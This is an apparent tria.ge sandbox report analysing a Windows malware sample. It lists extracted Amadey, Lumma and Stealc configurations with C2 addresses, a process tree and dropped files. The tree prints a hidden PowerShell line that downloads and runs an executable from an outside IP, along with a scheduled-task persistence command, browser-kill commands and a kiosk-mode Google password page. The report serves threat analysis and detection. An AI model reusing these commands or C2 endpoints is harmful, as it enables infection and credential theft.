Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/03/2025, 16:22

General

  • Target

    05fdff6b612497f1292bd7c12fd54d00.exe

  • Size

    938KB

  • MD5

    05fdff6b612497f1292bd7c12fd54d00

  • SHA1

    611df7ad895719e22ccdfc8068e7e93afd2c2b7b

  • SHA256

    4b6809eadff24e320c31e9bbef3a6bd66ef7861ee9280bff726d9be05ee92113

  • SHA512

    3a522cb7aa14cbf32864b489c4c7c5ab700456ab90195dd927dcd3d08a30541f60941660a7d5252b5d57ec0f8dae4e90532e8d4e24b5443aa60db327697d73ac

  • SSDEEP

    24576:YqDEvCTbMWu7rQYlBQcBiT6rprG8a06u:YTvC/MTQYxsWR7a06

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://defaulemot.run/api

https://begindecafer.world/api

https://9garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://sterpickced.digital/api

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 4 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 6 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 14 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 18 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\05fdff6b612497f1292bd7c12fd54d00.exe
    "C:\Users\Admin\AppData\Local\Temp\05fdff6b612497f1292bd7c12fd54d00.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn PpBNImao8vK /tr "mshta C:\Users\Admin\AppData\Local\Temp\P3oVQ8dV3.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2776
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn PpBNImao8vK /tr "mshta C:\Users\Admin\AppData\Local\Temp\P3oVQ8dV3.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2744
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\P3oVQ8dV3.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KDLCREN2PVBGQOJ9BC2I26RTIKUWTNXF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1808
        • C:\Users\Admin\AppData\Local\TempKDLCREN2PVBGQOJ9BC2I26RTIKUWTNXF.EXE
          "C:\Users\Admin\AppData\Local\TempKDLCREN2PVBGQOJ9BC2I26RTIKUWTNXF.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:320
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2860
            • C:\Users\Admin\AppData\Local\Temp\10126650101\ed461e25cb.exe
              "C:\Users\Admin\AppData\Local\Temp\10126650101\ed461e25cb.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:836
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 836 -s 1196
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:936
            • C:\Users\Admin\AppData\Local\Temp\10126660101\67f19a0eae.exe
              "C:\Users\Admin\AppData\Local\Temp\10126660101\67f19a0eae.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:2412
            • C:\Users\Admin\AppData\Local\Temp\10126670101\4d5bf9d2d6.exe
              "C:\Users\Admin\AppData\Local\Temp\10126670101\4d5bf9d2d6.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2656
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:600
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2620
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:576
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3020
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1876
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                  PID:1628
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:2056
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2056.0.1196421481\1006704746" -parentBuildID 20221007134813 -prefsHandle 1200 -prefMapHandle 1144 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {abeb8bb1-dd40-4ad0-af56-ec02aad153ac} 2056 "\\.\pipe\gecko-crash-server-pipe.2056" 1372 121f3558 gpu
                      9⤵
                        PID:1296
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2056.1.804841032\555646337" -parentBuildID 20221007134813 -prefsHandle 1540 -prefMapHandle 1536 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {828c70c4-0fd7-4c32-af6c-20e41ab820f3} 2056 "\\.\pipe\gecko-crash-server-pipe.2056" 1552 f74e58 socket
                        9⤵
                          PID:2288
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2056.2.1344113334\281784006" -childID 1 -isForBrowser -prefsHandle 2096 -prefMapHandle 2092 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {72f45139-44c2-411a-95ee-aec6f3ba1c2e} 2056 "\\.\pipe\gecko-crash-server-pipe.2056" 2108 19f9e058 tab
                          9⤵
                            PID:1604
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2056.3.519853433\869109136" -childID 2 -isForBrowser -prefsHandle 2620 -prefMapHandle 2612 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {310be0a2-ea6b-4a82-8dc9-ff57c261dd78} 2056 "\\.\pipe\gecko-crash-server-pipe.2056" 2632 f64258 tab
                            9⤵
                              PID:1632
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2056.4.1415775178\1617376147" -childID 3 -isForBrowser -prefsHandle 3700 -prefMapHandle 3732 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a473a0d3-a419-4e39-a913-a0610903670f} 2056 "\\.\pipe\gecko-crash-server-pipe.2056" 3744 1ede3558 tab
                              9⤵
                                PID:1992
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2056.5.722996232\1815035286" -childID 4 -isForBrowser -prefsHandle 3852 -prefMapHandle 3856 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b698db0f-66b8-4e88-8238-fc1ff4416fe2} 2056 "\\.\pipe\gecko-crash-server-pipe.2056" 3840 1ede4158 tab
                                9⤵
                                  PID:1656
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2056.6.1302426421\926975005" -childID 5 -isForBrowser -prefsHandle 4016 -prefMapHandle 4020 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8856b479-0f75-4386-98bf-a3f719b2911d} 2056 "\\.\pipe\gecko-crash-server-pipe.2056" 4004 1ede4458 tab
                                  9⤵
                                    PID:2160
                            • C:\Users\Admin\AppData\Local\Temp\10126680101\819295da73.exe
                              "C:\Users\Admin\AppData\Local\Temp\10126680101\819295da73.exe"
                              6⤵
                              • Modifies Windows Defender DisableAntiSpyware settings
                              • Modifies Windows Defender Real-time Protection settings
                              • Modifies Windows Defender TamperProtection settings
                              • Modifies Windows Defender notification settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:932

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\activity-stream.discovery_stream.json.tmp

                    Filesize

                    26KB

                    MD5

                    7df9285cdaeec01cf8d90dc010e21368

                    SHA1

                    8a53732095b695c28b1b24743c36e58d556da0fb

                    SHA256

                    dd14dc1ac286202266e8660bffe09cb1d3b10c1e45f92c7736bfbd45604a29a5

                    SHA512

                    d5e9310420de038126aeea53f0feff99d3302936c6c4341b6a509941be180133d3e67b9c27a5d6dca1dfa35c355e5c9638a6a7e21d1736b3a34e26943d285f19

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                    Filesize

                    15KB

                    MD5

                    96c542dec016d9ec1ecc4dddfcbaac66

                    SHA1

                    6199f7648bb744efa58acf7b96fee85d938389e4

                    SHA256

                    7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                    SHA512

                    cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                  • C:\Users\Admin\AppData\Local\Temp\10126650101\ed461e25cb.exe

                    Filesize

                    3.1MB

                    MD5

                    d3678cf7d1ed502598ff3fe50c1b11e7

                    SHA1

                    b706c802ef43af66a05254ffbffcf88fbea7f07a

                    SHA256

                    ce17f1dca8151d24bde598e8678be5153609f995a6cbfcb052177f7cefdeafa6

                    SHA512

                    c5a728fd6d6ebeca60ba6ed3d1fdb8151cb62084c605a2fdaeba390f456b95e89b208b932f5c3d520c4d5c60706dd74141195fb57c2a8630d178d34c26992f78

                  • C:\Users\Admin\AppData\Local\Temp\10126660101\67f19a0eae.exe

                    Filesize

                    1.7MB

                    MD5

                    79ba9165be6c8031465525f48fe1a7b0

                    SHA1

                    08d8d07d9929814e3dde81920f86b16d8c9f1284

                    SHA256

                    8947b1b6d7d09243e7e6d0abeaf0df6b410e5065e8e78e8d66ebace1dbb3a9d9

                    SHA512

                    9950253099354c3090b0afb173ff36f9bbf7fb6c4aa4f71ede0ea4b1ce7087ed4212fd87290db981c06066d70c1cf45563662f1419dcff68be3240dcd021829f

                  • C:\Users\Admin\AppData\Local\Temp\10126670101\4d5bf9d2d6.exe

                    Filesize

                    950KB

                    MD5

                    25322eaf6927513a16e248ea37a3a9d7

                    SHA1

                    584e12fb816e27012c61edfd9ed5efbf1137fc08

                    SHA256

                    04655ec920c50bddbdb9fe5ad953f79baf8bdad0f3d28d2a1ae1aab8caabca52

                    SHA512

                    336f1892870dfcb10afc267ec3280ae84af3ceed3e5cb42c7e1995ea3b29d0226e4f14bf4463213f1523ac0020283d787966169cbb43a8f3b1478ed2361b6919

                  • C:\Users\Admin\AppData\Local\Temp\10126680101\819295da73.exe

                    Filesize

                    2.7MB

                    MD5

                    1e460c52dda47dcd8107802d6d7912e6

                    SHA1

                    a83808704df881e5242b4742c5a8194476111fff

                    SHA256

                    5e5820dd23335657df1c6069466d5a98e5d6cfcce60b899b3fca1528f6ffb2e4

                    SHA512

                    b16ca3d2bd4ad60833ad96ee3f7e38c46c133a309a22e5e7420f21b234e64255f8eee1d576fb169f4b72e2f17eafde060bc8b89769a0d9a74f395dfbe80e6824

                  • C:\Users\Admin\AppData\Local\Temp\P3oVQ8dV3.hta

                    Filesize

                    717B

                    MD5

                    d9fc6f8084bd76b6f2f33fc41706d481

                    SHA1

                    b9acb0bc13c7ddbfcc13889a6a219a3f2002dbe4

                    SHA256

                    737127d3bc57684cf5da0cacd46b2ebbf01d1b7c33acee06a400725d7404db84

                    SHA512

                    5807e703373ba54aca960c77117a98bd09f75f18665c68beec7e442a242307d24c42d72f7807eecc7542476ee4ed1e4d9312851e9de3e9954d453435c47df269

                  • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                    Filesize

                    442KB

                    MD5

                    85430baed3398695717b0263807cf97c

                    SHA1

                    fffbee923cea216f50fce5d54219a188a5100f41

                    SHA256

                    a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                    SHA512

                    06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                  • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                    Filesize

                    8.0MB

                    MD5

                    a01c5ecd6108350ae23d2cddf0e77c17

                    SHA1

                    c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                    SHA256

                    345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                    SHA512

                    b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\db\data.safe.bin

                    Filesize

                    2KB

                    MD5

                    f3e1136c686f486c957b3243890a9072

                    SHA1

                    89b0261fe945047fd68eae241a7c40ab0b013c42

                    SHA256

                    2a3dada396025b55a63eba34357f0d7320cd0f37dfb2b8e4bff13f63096fb299

                    SHA512

                    a587b485d5685cd7db5a1ae1d39bc9e5e34a0067b71202a4714b161ab9bd9f2de2cca13c84096b03c660f7eeca98d136fffc70235daf612dfb2b42a9a5626934

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\726bb2d5-fb50-402f-be4c-4c3a07a51e9e

                    Filesize

                    745B

                    MD5

                    a9f90f2c45254964e36adde3eefa560c

                    SHA1

                    c85870fe77ec579500c776907ceb84a73ca9a40a

                    SHA256

                    5f6c02bece9ce7848853fe984cdf17d6264362545a524bf6a78aa3063800c602

                    SHA512

                    1246596af5e546300387f34b28659bb24865750f1662023af48b80fc25025896b08225e7969eecc88ad3cbd98e48e5d41713dfe7119a35387d733817f62ddb26

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\fcf3d43b-a43d-46cf-b344-6b4f2c147b40

                    Filesize

                    13KB

                    MD5

                    432cd919f34cdb06719ef39cbd17d1c9

                    SHA1

                    266fc5a2ed8aebdb99d7ca10727e1ba832637e13

                    SHA256

                    f599bf76899099ed364e536ddc2130d66905dd24e7850faa89abab488d1b120c

                    SHA512

                    4e454d640bf42175960e30ebe21dfde7da422088f64a3ef895cb32f6b631e27bea777acc8ee6b57f774cd57c09b47115c7da3b7ae7630b39844a0c0ae5c64e56

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

                    Filesize

                    997KB

                    MD5

                    fe3355639648c417e8307c6d051e3e37

                    SHA1

                    f54602d4b4778da21bc97c7238fc66aa68c8ee34

                    SHA256

                    1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

                    SHA512

                    8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

                    Filesize

                    116B

                    MD5

                    3d33cdc0b3d281e67dd52e14435dd04f

                    SHA1

                    4db88689282fd4f9e9e6ab95fcbb23df6e6485db

                    SHA256

                    f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

                    SHA512

                    a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

                    Filesize

                    479B

                    MD5

                    49ddb419d96dceb9069018535fb2e2fc

                    SHA1

                    62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

                    SHA256

                    2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

                    SHA512

                    48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

                    Filesize

                    372B

                    MD5

                    8be33af717bb1b67fbd61c3f4b807e9e

                    SHA1

                    7cf17656d174d951957ff36810e874a134dd49e0

                    SHA256

                    e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

                    SHA512

                    6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

                    Filesize

                    11.8MB

                    MD5

                    33bf7b0439480effb9fb212efce87b13

                    SHA1

                    cee50f2745edc6dc291887b6075ca64d716f495a

                    SHA256

                    8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

                    SHA512

                    d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

                    Filesize

                    1KB

                    MD5

                    688bed3676d2104e7f17ae1cd2c59404

                    SHA1

                    952b2cdf783ac72fcb98338723e9afd38d47ad8e

                    SHA256

                    33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

                    SHA512

                    7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

                    Filesize

                    1KB

                    MD5

                    937326fead5fd401f6cca9118bd9ade9

                    SHA1

                    4526a57d4ae14ed29b37632c72aef3c408189d91

                    SHA256

                    68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

                    SHA512

                    b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

                    Filesize

                    6KB

                    MD5

                    72282fc2044b5166099aa2399fda2bb6

                    SHA1

                    0e25913df7e3b661b4787bcac5b83b395ca2c480

                    SHA256

                    936053b5ce41f6a9999f32721d1cc6dfbc960111f2ae101fea156eee507f9c7e

                    SHA512

                    15e8bf312e2c0fe955ee1748652c24ad2ac78e044e44a7da30c1cedf0df80dbfbd131b64fe6de3093334331530266ddb8a40590c862520c7b2824524bb0a8d00

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

                    Filesize

                    6KB

                    MD5

                    8330b99383dd4d722ae362eff4e68190

                    SHA1

                    12ccac4e3be68dbc455934841a6e3c2d6ce0f5c7

                    SHA256

                    ffcd209a1384fbf6158c9735a60330b4d54b9291cfb44a3f605e31750709ac08

                    SHA512

                    8018bde258e12b4917ba1582f96c8ea32ffeeb43d94cd080158cc51d23845f6e40af1ef9a30e2398b556437c98b12bba491e5bb7ddf40e5afec8e3dec5b5d9aa

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

                    Filesize

                    7KB

                    MD5

                    2a613ab73ceb617641979f43761e9187

                    SHA1

                    5f41c3d02feee5b096d4edf2ab897fdaaf7f36a9

                    SHA256

                    40dd27927355692448949794476d9b3666e75ba1ab0f29567f63fe6a2c521c37

                    SHA512

                    5cb9a7f5b33b36d72789326647152084f188a05386a1c23c0b9106f6825d5a67adfeb774778a5debac159a1198bc83616a1ffed3a9c3961244fd3719d532a72b

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\sessionstore-backups\recovery.jsonlz4

                    Filesize

                    4KB

                    MD5

                    dd096eded1d376fcdb612f2ab79a0322

                    SHA1

                    f30bef0b05de765e243e8573349095a470e67dbd

                    SHA256

                    dd3cdb54cb72264d6adc0303fac35a85b671fd5c29776e3dce904ff93e1e1eaf

                    SHA512

                    e40bea98415acb0b4f5daf6205a7c07d596fa133a846859a2848dd221f00301a077301a33e57894727f93866aec2c9d1f2c53fd66d09e630efe6893cf433962b

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                    Filesize

                    4.9MB

                    MD5

                    485dc01ebdeff25c8868a2d7ba54eee1

                    SHA1

                    53954697b9fd006e3361f9fe7237aad1c4da6a11

                    SHA256

                    e5b253acab67be3ff43776be2583061584356fe8f0e56daf2c21b604301533a8

                    SHA512

                    000cbde3ddf7aac70fd17fed9c6e4d98d2c7c109f3fba0fecc6198cd34e03fd16fea2e7a03b03a218666a9cb7ca58717c5f408d7b68bd4d94d006deaf9d8095f

                  • \Users\Admin\AppData\Local\TempKDLCREN2PVBGQOJ9BC2I26RTIKUWTNXF.EXE

                    Filesize

                    1.8MB

                    MD5

                    2058198accbc051944c9d377276fe54a

                    SHA1

                    4065ba25c377d2db397c37da6c598c98cbec851e

                    SHA256

                    a2a560e52feb37bb04aba6f8a46e1818aaf823a169eba1b2784d9b66e4d3343f

                    SHA512

